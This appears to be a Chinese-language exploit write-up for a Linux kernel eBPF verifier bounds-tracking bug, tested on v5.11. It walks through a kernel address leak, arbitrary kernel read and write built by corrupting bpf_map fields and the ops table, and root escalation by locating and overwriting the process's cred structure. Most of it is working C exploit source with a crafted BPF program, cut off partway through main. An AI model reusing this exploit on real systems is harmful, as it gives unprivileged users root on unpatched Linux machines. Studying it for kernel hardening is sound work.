struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
                                     tnum_range(reg->u32_min_value,
                                     reg->u32_max_value));

总结：这里最终使得verifier认为r6的低32位是确定为 0x2的。但是，我们可以在实际执行时，指定其为 0x1。

最后执行r6 & 0x1，verifier认为 r6&0x1 = 0x2&0x1 =0x0，但是实际可以为 0x1&0x1 = 0x1

地址泄漏

这里后续的利用方法，和cve-2020-8835相同。这里大概讲解一下。

  BPF_MAP_GET(1, BPF_REG_7),						// r7 = *(u64 *)(r0 +0)
  BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 0, 23),			// if r7 != 0x0 goto pc+23
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),		// r6 *= 0x110
BPF_MAP_GET_ADDR(0, BPF_REG_7),					// r7 =map_value(id=0,off=0,ks=4,vs=8,imm=0) R7=invP0 R8=invP0 R9=ma?
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),	// r7 -= r6
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),	// r8 = *(u64 *)(r7 +0)
BPF_MAP_GET_ADDR(4, BPF_REG_6),					
BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_8, 0),	//	*(u64 *)(r6 +0) = r8
BPF_EXIT_INSN(),

这里以r7=map[1]作为指令类型，来实现执行不同的流程。如果 r7 = 0时:

R6 *= 0x110，这里 verifier认为r6 *= 0x110 = 0x0，实际为r6 *= 0x110 = 0x110
取r7为map_fd地址
r7 -= r6，verifier认为r7 -= r6 -> r7 -= 0x0不越界，但是实际为r7 -= r6 -> r7 -= 0x110，发生了越界
然后将r7所指向地址的值赋值给r8，此时r7 = map_fd -0x110，这个地址存储的是bpf_map_ops的地址。
随后获取map[4]的地址给 r6
最后将r8的值赋值给 r6指向的地址
最后，我们可以通过读取map[4]的值来获取 bpf_map_ops的地址

泄漏了bpf_map_ops的地址，减去偏移，即可获得内核基址。

任意地址读

BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 1, 22),	// op=1 -> write btf
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0xd0),    // &value[0]-0x110+0x40 = &value[0]-0xd0
BPF_MAP_GET_ADDR(0, BPF_REG_7),
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),
BPF_MAP_GET(2, BPF_REG_8),					// value[2] 传入 target_addr-0x58 
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
BPF_EXIT_INSN(),

首先将r6 *= 0xd0
然后r7 = &map[0]
随后计算 r7 -= r6 -> r7 -= 0xd0，此时r7的地址为map->btf变量
r8 = map[2] = target_addr - 0x58
将r8的值赋值给 r7，也即将map->btf赋值为了target_addr - 0x58的地址
最后调用 BPF_OBJ_GET_INFO_BY_FD -> bpf_obj_get_info_by_fd() -> bpf_map_get_info_by_fd()，即可将 *(map->btf) + 0x58 即 target_addr - 0x58 + 0x58的值读取出来

实现了任意地址读，这里注意每次只能读取4字节。

泄漏map地址

因为后续实现任意地址写时，需要将 map结构体内的变量修改为map的地址。所以这里需要泄漏map空间的地址。

BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 2, 23),	// op=2 -> read attr
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x50),					// 偏移 -0x110+0xc0=-0x50 也即&value[0]的地址
BPF_MAP_GET_ADDR(0, BPF_REG_7),
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),
BPF_MAP_GET_ADDR(4, BPF_REG_6),
BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_8, 0),
BPF_EXIT_INSN(),

这里由于map->wait_list存储的地址是&map+0xc0的地址，所以只需要将map->wait_list的值读取出来，就可以泄漏出map的地址了。

这里map->wait_list的偏移为0xc0，所以相当于r7-0x50 = &map+0xc0。

然后再将r7的值赋值给r8，再将r8赋值给map[4]。后续用户态读取map[4]即可泄漏地址。

任意地址写

BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 3, 60),				// write ops and change type
BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),					// r8 = r6
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),			// r6 = r6*0x110
BPF_MAP_GET_ADDR(0, BPF_REG_7),								// r7 = &value[0]=bpf_array->map->ops->map_push_elem
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),			// r7 = r7-r6
BPF_MAP_GET(2, BPF_REG_6),										// r6 = value[2]      	传入&value[0]+0x80
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, 0),			// *(r7+0) = r6    篡改 bpf_array->map->opsmap_push_elem = &value[0]+0x80 = (bpf_array->map->opsmap_push_elem->array_map_get_next_key)
BPF_MOV64_REG(BPF_REG_6, BPF_REG_8),					// r6 = r8			  	恢复r6
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0xf8),				// r8 = r8*0xf8
BPF_MAP_GET_ADDR(0, BPF_REG_7),							// r7 = &value[0]
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),			// r7 = r7 - r8
BPF_ST_MEM(BPF_W, BPF_REG_7, 0, 0x17), 					// *(r7+0) = 0x17  		bpf_array->map->map_type (0x18) 	-0x110+0x18 = -0xf8 		改为 BPF_MAP_TYPE_STACK (0x17)
BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),					// r8 = r6
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0xec),				// r6 = r6*0xec
BPF_MAP_GET_ADDR(0, BPF_REG_7),							// r7 = &value[0]
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),			// r7 = r7 - r6
BPF_ST_MEM(BPF_W, BPF_REG_7, 0, -1),					// *(r7+0) = -1			bpf_array->map->max_entries (0x24)   -0x110+0x24 = -0xec
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0xe4),				// r8 = r8*0xe4
BPF_MAP_GET_ADDR(0, BPF_REG_7),							// r7 = &value[0]
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),			// r7 = r7 - r8
BPF_ST_MEM(BPF_W, BPF_REG_7, 0, 0),						// *(r7+0) = 0		 	bpf_array->map->spin_lock_off (0x2c)   -0x110+0x2c = -0xe4
BPF_EXIT_INSN(),

这里想实现任意地址写。需要用到如下流程：

当我们使用map_update_elem函数时，会调用bpf_map_ops虚函数表中的 map_push_elem函数指针。

uint64_t fake_map_ops[]={

    kaslr +0xffffffff8116ec70,                 
    kaslr +0xffffffff8116fa00,                 
    0x0,                                       
    kaslr +0xffffffff8116f2d0,                 
    kaslr +0xffffffff8116ed50,// 5: map_get_next_key  
    0x0,                                       
    //...                
    kaslr +0xffffffff8116ed80,                 
    kaslr +0xffffffff8116ed50,//15: map_push_elem 
    0x0,                                       
    0x0,                                       
    //...                
}

 static int bpf_map_update_value(struct bpf_map *map, struct fd f, void *key,  
                void *value, __u64 flags)                                     
{                                                                             
//...                    
    } else if (map->map_type == BPF_MAP_TYPE_QUEUE ||     
        ¦  map->map_type == BPF_MAP_TYPE_STACK) {         
        err = map->ops->map_push_elem(map, value, flags); 
//..

而在bpf_map_ops虚函数表中，还有一个函数指针array_map_get_next_key函数。从函数流程中，可以看到一个赋值操作。其将传入的第三个参数 next_key赋值为了传入的第二个参数key(只要key值非空)。

static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)   
{                                                                                   
    struct bpf_array *array = container_of(map, struct bpf_array, map);             
    u32 index = key ? *(u32 *)key : U32_MAX;                                        
    u32 *next = (u32 *)next_key;                                                    

    if (index >= array->map.max_entries) {    //index                                      
        *next = 0;                                                                  
        return 0;                                                                   
    }                                                                               

    if (index == array->map.max_entries - 1)                                        
        return -ENOENT;                                                             
		//赋值操作
    *next = index + 1;                                                              
    return 0;                                                                       
}

如果我们将bpf_map_ops虚函数表中的 map_push_elem指针改写为array_map_get_next_key函数指针。那么就可以通过在用户态调用map_update_elem(fd, &key, &value, addr)函数，实现*addr = value，也即实现了一个任意地址写。

当然，这里直接覆写指针是不行的。需要满足如下三个条件：

map 的类型必须是BPF_MAP_TYPE_QUEUE或者BPF_MAP_TYPE_STACK, 每次调用map_update_elem时, 才会调用map_push_elem。但是这个map_type也是位于map 上，所以需要把map_type 改成BPF_MAP_TYPE_STACK(0x17)
此外，写入的index要满足(index >= array->map.max_entries),所以 map_entries 需要改成0xffff ffff
还有就是 map->spin_lock_off变量需要等于 0

BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 3, 60),				// write ops and change type
BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),					// r8 = r6
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),			// r6 = r6*0x110
BPF_MAP_GET_ADDR(0, BPF_REG_7),								// r7 = &value[0]=bpf_array->map->ops->map_push_elem
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),			// r7 = r7-r6
BPF_MAP_GET(2, BPF_REG_6),										// r6 = value[2]      	传入&value[0]+0x80
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, 0),			// *(r7+0) = r6    篡改 bpf_array->map->opsmap_push_elem = &value[0]+0x80 = (bpf_array->map->ops->array_map_get_next_key)

将r7赋值为bpf_array->map->opsmap_push_elem的地址，将r6赋值为bpf_array->map->ops->array_map_get_next_key的地址。

随后将r6的值赋值给 r7，实现指针的修改。

后面依次修改各个属性的值，即可。

提权

有了任意地址写之后，提权的方法就比较多了。常见的是搜索当前进程task_struct，然后修改cred结构的方法。

之前我用的搜索方法都是，通过prctl函数中的PR_SET_NAME功能对task_struct里有的char comm[TASK_COMM_LEN]设置我们的字符串，然后利用任意地址读写，去遍历查找该字符串，从而得到cred的地址。但是，这种方法需要爆破的地址段太大了，并且如果读取到不可读的地址段还会报错。

这里，参考别人的文章，学到了一种更加通用和成功率更高的方法。

首先通过kallsyms中查找到init_pid_ns函数的地址；

通过init_pid_ns偏移0x30处存储了第一个task_struct的地址；

获取当前exp的进程号；

遍历task_struct->tasks->next链表，读取每个进程的pid号，当遍历到等于exp进程的进程号时，说明找到了exp所在进程地址。

获取exp进程的cred地址。

通过任意地址写，修改cred结构体的权限标志位。

EXP

// test in Linux-v5.11
// 所有的 update_elem(0, 0x180000000); 都改成 update_elem(0, 0);
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <pthread.h>
#include <sys/wait.h>
// #include <linux/bpf.h>
#include <sys/mman.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <sys/socket.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <stddef.h>
#include "./bpf.h"

#ifndef __NR_BPF
#define __NR_BPF 321
#endif
#define ptr_to_u64(ptr) ((__u64)(unsigned long)(ptr))

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
	((struct bpf_insn){                        \
		.code = CODE,                          \
		.dst_reg = DST,                        \
		.src_reg = SRC,                        \
		.off = OFF,                            \
		.imm = IMM})

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)    \
	((struct bpf_insn){                    \
		.code = BPF_LD | BPF_DW | BPF_IMM, \
		.dst_reg = DST,                    \
		.src_reg = SRC,                    \
		.off = 0,                          \
		.imm = (__u32)(IMM)}),             \
		((struct bpf_insn){                \
			.code = 0,                     \
			.dst_reg = 0,                  \
			.src_reg = 0,                  \
			.off = 0,                      \
			.imm = ((__u64)(IMM)) >> 32})

#define BPF_MOV64_IMM(DST, IMM) BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV_REG(DST, SRC) BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV32_REG(DST, SRC)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_MOV | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

#define BPF_MOV64_REG(DST, SRC) BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV_IMM(DST, IMM) BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_RSH_REG(DST, SRC) BPF_RAW_INSN(BPF_ALU64 | BPF_RSH | BPF_X, DST, SRC, 0, 0)

#define BPF_LSH_IMM(DST, IMM) BPF_RAW_INSN(BPF_ALU64 | BPF_LSH | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU32_IMM(OP, DST, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_OP(OP) | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

#define BPF_ALU64_IMM(OP, DST, IMM) BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU64_REG(OP, DST, SRC) BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU_IMM(OP, DST, IMM) BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_JMP_IMM(OP, DST, IMM, OFF) BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_JMP_REG(OP, DST, SRC, OFF) BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP32_REG(OP, DST, SRC, OFF) BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP32_IMM(OP, DST, IMM, OFF) BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_EXIT_INSN() BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

#define BPF_LD_MAP_FD(DST, MAP_FD) BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

#define BPF_LD_IMM64(DST, IMM) BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_ST_MEM(SIZE, DST, OFF, IMM) BPF_RAW_INSN(BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, DST, 0, OFF, IMM)

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) BPF_RAW_INSN(BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

#define BPF_STX_MEM(SIZE, DST, SRC, OFF) BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

int doredact = 0;
#define LOG_BUF_SIZE 65536
char bpf_log_buf[LOG_BUF_SIZE];
char buffer[64];
int sockets[2];
int mapfd;

void fail(const char *fmt, ...)
{
	va_list args;
	va_start(args, fmt);
	fprintf(stdout, "[!] ");
	vfprintf(stdout, fmt, args);
	va_end(args);
	exit(1);
}

void redact(const char *fmt, ...)
{
	va_list args;
	va_start(args, fmt);
	if (doredact)
	{
		fprintf(stdout, "[!] ( ( R E D A C T E D ) )\n");
		return;
	}
	fprintf(stdout, "[*] ");
	vfprintf(stdout, fmt, args);
	va_end(args);
}

void msg(const char *fmt, ...)
{
	va_list args;
	va_start(args, fmt);
	fprintf(stdout, "[*] ");
	vfprintf(stdout, fmt, args);
	va_end(args);
}

int bpf_create_map(enum bpf_map_type map_type,
				   unsigned int key_size,
				   unsigned int value_size,
				   unsigned int max_entries)
{
	union bpf_attr attr = {
		.map_type = map_type,
		.key_size = key_size,
		.value_size = value_size,
		.max_entries = max_entries};

	return syscall(__NR_BPF, BPF_MAP_CREATE, &attr, sizeof(attr));
}

int bpf_obj_get_info_by_fd(int fd, const unsigned int info_len, void *info)
{
	union bpf_attr attr;
	memset(&attr, 0, sizeof(attr));
	attr.info.bpf_fd = fd;
	attr.info.info_len = info_len;
	attr.info.info = ptr_to_u64(info);
	return syscall(__NR_BPF, BPF_OBJ_GET_INFO_BY_FD, &attr, sizeof(attr));
}

int bpf_lookup_elem(int fd, const void *key, void *value)
{
	union bpf_attr attr = {
		.map_fd = fd,
		.key = ptr_to_u64(key),
		.value = ptr_to_u64(value),
	};

	return syscall(__NR_BPF, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

int bpf_update_elem(int fd, const void *key, const void *value,
					uint64_t flags)
{
	union bpf_attr attr = {
		.map_fd = fd,
		.key = ptr_to_u64(key),
		.value = ptr_to_u64(value),
		.flags = flags,
	};

	return syscall(__NR_BPF, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

int bpf_prog_load(enum bpf_prog_type type,
				  const struct bpf_insn *insns, int insn_cnt,
				  const char *license)
{
	union bpf_attr attr = {
		.prog_type = type,
		.insns = ptr_to_u64(insns),
		.insn_cnt = insn_cnt,
		.license = ptr_to_u64(license),
		.log_buf = ptr_to_u64(bpf_log_buf),
		.log_size = LOG_BUF_SIZE,
		.log_level = 1,
	};

	return syscall(__NR_BPF, BPF_PROG_LOAD, &attr, sizeof(attr));
}


#define BPF_LD_ABS(SIZE, IMM)                      \
	((struct bpf_insn){                            \
		.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
		.dst_reg = 0,                              \
		.src_reg = 0,                              \
		.off = 0,                                  \
		.imm = IMM})

#define BPF_MAP_GET(idx, dst)                                                \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),                                     \
		BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                                \
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                               \
		BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),                              \
		BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
		BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                               \
		BPF_EXIT_INSN(),                                                     \
		BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0),                              \
		BPF_MOV64_IMM(BPF_REG_0, 0)

#define BPF_MAP_GET_ADDR(idx, dst)											 \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),                                     \
		BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                                \
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                               \
		BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),                              \
		BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
		BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                               \
		BPF_EXIT_INSN(),                                                     \
		BPF_MOV64_REG((dst), BPF_REG_0),                              \
		BPF_MOV64_IMM(BPF_REG_0, 0)

int load_prog()
{
	struct bpf_insn prog[] = {
        BPF_LD_MAP_FD(BPF_REG_9, mapfd),				// 0: (18) r9 = 0x0
// (1) trigger vulnerability
        BPF_LD_IMM64(BPF_REG_8, 0x1),					// 2: (18) r8 = 0x1
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32),			// 4: (67) r8 <<= 32     	0x10000 0000
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2),			// 5: (07) r8 += 2       	0x10000 0002

        BPF_MAP_GET(0, BPF_REG_5),						// 13: (79) r5 = *(u64 *)(r0 +0)
        BPF_MOV64_REG(BPF_REG_6, BPF_REG_5),			// 15: (bf) r6 = r5

        BPF_LD_IMM64(BPF_REG_2, 0xFFFFFFFF),			// 16: (18) r2 = 0xffffffff
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32),			// 18: (67) r2 <<= 32 		0xFFFFFFFF00000000
        BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_2),	// 19: (5f) r6 &= r2        高32位 unknown, 低32位known 为0
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1),			// 20: (07) r6 += 1    		mask = 0xFFFFFFFF00000000, value = 0x1
        // trigger the vulnerability
        BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8), 	// 21: (5f) r6 &= r8 		r6: u32_min_value=1, u32_max_value=0

        // BPF_MOV32_REG(BPF_REG_6, BPF_REG_6),			// 26: (bc) w6 = w6 		对64位进行截断，只看32位部分
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1),			// 22: (07) r6 += 1 		r6 : u32_max_value = 1, u32_min_value = 2, var_off = {0x100000000; value = 0x1}
        BPF_JMP32_IMM(BPF_JLE, BPF_REG_5, 1, 1),		// 23: (b6) if w5 <= 0x1 goto pc+1   r5: u32_min_value = 0, u32_max_value = 1, var_off = {mask = 0xFFFFFFFF00000001; value = 0x0}
		BPF_EXIT_INSN(),

		BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_5),	// 25: (0f) r6 += r5 		r6: verify:2   fact:1 
		BPF_MOV32_REG(BPF_REG_6, BPF_REG_6),			// 26: (bc) w6 = w6 		对64位进行截断，只看32位部分
		BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1),			// 		r6: verify:0   fact:1 
// (2) read kaslr  	(op=0)	泄露内核基址，读取bpf_array->map->ops指针，位于	&value[0]-0x110 (先获取&value[0]，减去0x110即可)，读出来的地址存放在value[4]
        BPF_MAP_GET(1, BPF_REG_7),						// 30: (79) r7 = *(u64 *)(r0 +0)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 0, 23),			// 32: (55) if r7 != 0x0 goto pc+23
		BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),		// 33: (27) r6 *= 272
		BPF_MAP_GET_ADDR(0, BPF_REG_7),					// 41: (bf) r7 =map_value(id=0,off=0,ks=4,vs=8,imm=0) R7=invP0 R8=invP0 R9=ma?
		BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),	// 43: (1f) r7 -= r6
		BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),	// 44: (79) r8 = *(u64 *)(r7 +0)
		BPF_MAP_GET_ADDR(4, BPF_REG_6),					
		BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_8, 0),	// 54: (7b) *(u64 *)(r6 +0) = r8
		BPF_EXIT_INSN(),
// (3) write btf 	(op=1)  任意地址读，一次只能读4字节，篡改 bpf_array->map->btf (偏移0x40)，利用 bpf_map_get_info_by_fd 泄露 map->btf+0x58 地址处的4字节
		BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 1, 22),	// op=1 -> write btf
		BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0xd0),    // &value[0]-0x110+0x40 = &value[0]-0xd0
		BPF_MAP_GET_ADDR(0, BPF_REG_7),
		BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),
		BPF_MAP_GET(2, BPF_REG_8),					// value[2] 传入 target_addr-0x58 
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
		BPF_EXIT_INSN(),
// (4) read attr	(op=2) 	读取value[0]的地址，也即 bpf_array->waitlist (偏移0xc0)指向自身，所以 &value[0]= &bpf_array->waitlist + 0x50，只需读取 &value[0]-0x110+0xc0 的值，加上0x50即可，读出来的地址存放在value[4]
		BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 2, 23),	// op=2 -> read attr
		BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x50),					// 偏移 -0x110+0xc0=-0x50 也即&value[0]的地址
		BPF_MAP_GET_ADDR(0, BPF_REG_7),
		BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),
		BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),
		BPF_MAP_GET_ADDR(4, BPF_REG_6),
		BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_8, 0),
		BPF_EXIT_INSN(),
// (5) write ops and change type	(op=3) 任意地址写，篡改 bpf_array->map->ops 函数表指针
		BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 3, 60),	// op=3 -> write ops and change type
		BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),					// r8 = r6
		BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),				// r6 = r6*0x110
		BPF_MAP_GET_ADDR(0, BPF_REG_7),							// r7 = &value[0]
		BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),			// r7 = r7-r6
		BPF_MAP_GET(2, BPF_REG_6),								// r6 = value[2]      	传入&value[0]+0x80
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, 0),			// *(r7+0) = r6    	  	篡改 bpf_array->map->ops = &value[0]+0x80
		BPF_MOV64_REG(BPF_REG_6, BPF_REG_8),					// r6 = r8			  	恢复r6
		BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0xf8),				// r8 = r8*0xf8
		BPF_MAP_GET_ADDR(0, BPF_REG_7),							// r7 = &value[0]
		BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),			// r7 = r7 - r8
		BPF_ST_MEM(BPF_W, BPF_REG_7, 0, 0x17), 					// *(r7+0) = 0x17  		bpf_array->map->map_type (0x18) 	-0x110+0x18 = -0xf8 		改为 BPF_MAP_TYPE_STACK (0x17)
		BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),					// r8 = r6
		BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0xec),				// r6 = r6*0xec
		BPF_MAP_GET_ADDR(0, BPF_REG_7),							// r7 = &value[0]
		BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),			// r7 = r7 - r6
		BPF_ST_MEM(BPF_W, BPF_REG_7, 0, -1),					// *(r7+0) = -1			bpf_array->map->max_entries (0x24)   -0x110+0x24 = -0xec
		BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0xe4),				// r8 = r8*0xe4
		BPF_MAP_GET_ADDR(0, BPF_REG_7),							// r7 = &value[0]
		BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),			// r7 = r7 - r8
		BPF_ST_MEM(BPF_W, BPF_REG_7, 0, 0),						// *(r7+0) = 0		 	bpf_array->map->spin_lock_off (0x2c)   -0x110+0x2c = -0xe4
		BPF_EXIT_INSN(),	
	};
	return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog) / sizeof(struct bpf_insn), "GPL");
}
// write_msg() —— trigger to execute eBPF code
int write_msg()
{
	ssize_t n = write(sockets[0], buffer, sizeof(buffer));
	if (n < 0)
	{
		perror("write");
		return 1;
	}
	if (n != sizeof(buffer))
	{
		fprintf(stderr, "short write: %d\n", n);
	}
	return 0;
}

void update_elem(int key, size_t val)
{
	if (bpf_update_elem(mapfd, &key, &val, 0)) {
		fail("bpf_update_elem failed '%s'\n", strerror(errno));
	}
}

size_t get_elem(int key)
{
	size_t val;
	if (bpf_lookup_elem(mapfd, &key, &val)) {
		fail("bpf_lookup_elem failed '%s'\n", strerror(errno));
	}
	return val;
}
// abitary read 64 bytes: 利用 bpf_obj_get_info_by_fd 读取两个4字节并拼接到一起
size_t read64(size_t addr)
{
	uint32_t lo, hi;
	char buf[0x50] = {0};
	update_elem(0, 0);	//	0x180000000
	update_elem(1, 1);
	update_elem(2, addr-0x58);											// change 7 $ p/x &(*(struct btf*)0)->id          value[2] 传入 target_addr-0x58 
	write_msg(); // 触发执行eBPF代码
	if (bpf_obj_get_info_by_fd(mapfd, 0x50, buf)) {
		fail("bpf_obj_get_info_by_fd failed '%s'\n", strerror(errno));
	}
	lo = *(unsigned int*)&buf[0x40];									// change 8 $ p/x &(*(struct bpf_map_info*)0)->btf_id     泄露的4字节存入&byf[0x40]
	update_elem(2, addr-0x58+4);
	write_msg();
	if (bpf_obj_get_info_by_fd(mapfd, 0x50, buf)) {
		fail("bpf_obj_get_info_by_fd failed '%s'\n", strerror(errno));
	}
	hi = *(unsigned int*)&buf[0x40];
	return (((size_t)hi) << 32) | lo;
}	

void clear_btf()
{
	update_elem(0, 0);	// 0x180000000
	update_elem(1, 1);
	update_elem(2, 0);
	write_msg();
}

void write32(size_t addr, uint32_t data)
{
	uint64_t key = 0;
	data -= 1;
	if (bpf_update_elem(mapfd, &key, &data, addr)) {
		fail("bpf_update_elem failed '%s'\n", strerror(errno));
	}
}
void write64(size_t addr, size_t data)
{
	uint32_t lo = data & 0xffffffff;
	uint32_t hi = (data & 0xffffffff00000000) >> 32;
	uint64_t key = 0;
	write32(addr, lo);
	write32(addr+4, hi);
}

int main()
{
// Step 1: create eBPF code, verify and trigger the vulnerability
	mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 0x100);
	if (mapfd < 0)
	{
		fail("failed to create map '%s'\n", strerror(errno));
	}
	redact("sneaking evil bpf past the verifier\n");
	int progfd = load_prog();  // verify
	printf("%s\n", bpf_log_buf);
	if (progfd < 0)
	{
		if (errno == EACCES)
		{
			msg("log:\n%s", bpf_log_buf);
		}
		printf("%s\n", bpf_log_buf);
		fail("failed to load prog '%s'\n", strerror(errno));
	}

	redact("creating socketpair()\n");
	if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
	{
		fail("failed to create socket pair '%s'\n", strerror(errno));
	}

	redact("attaching bpf backdoor to socket\n");
	if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
	{
		fail("setsockopt '%s'\n", strerror(errno));
	}
// Step 2: leak kernel_base  (op=0)
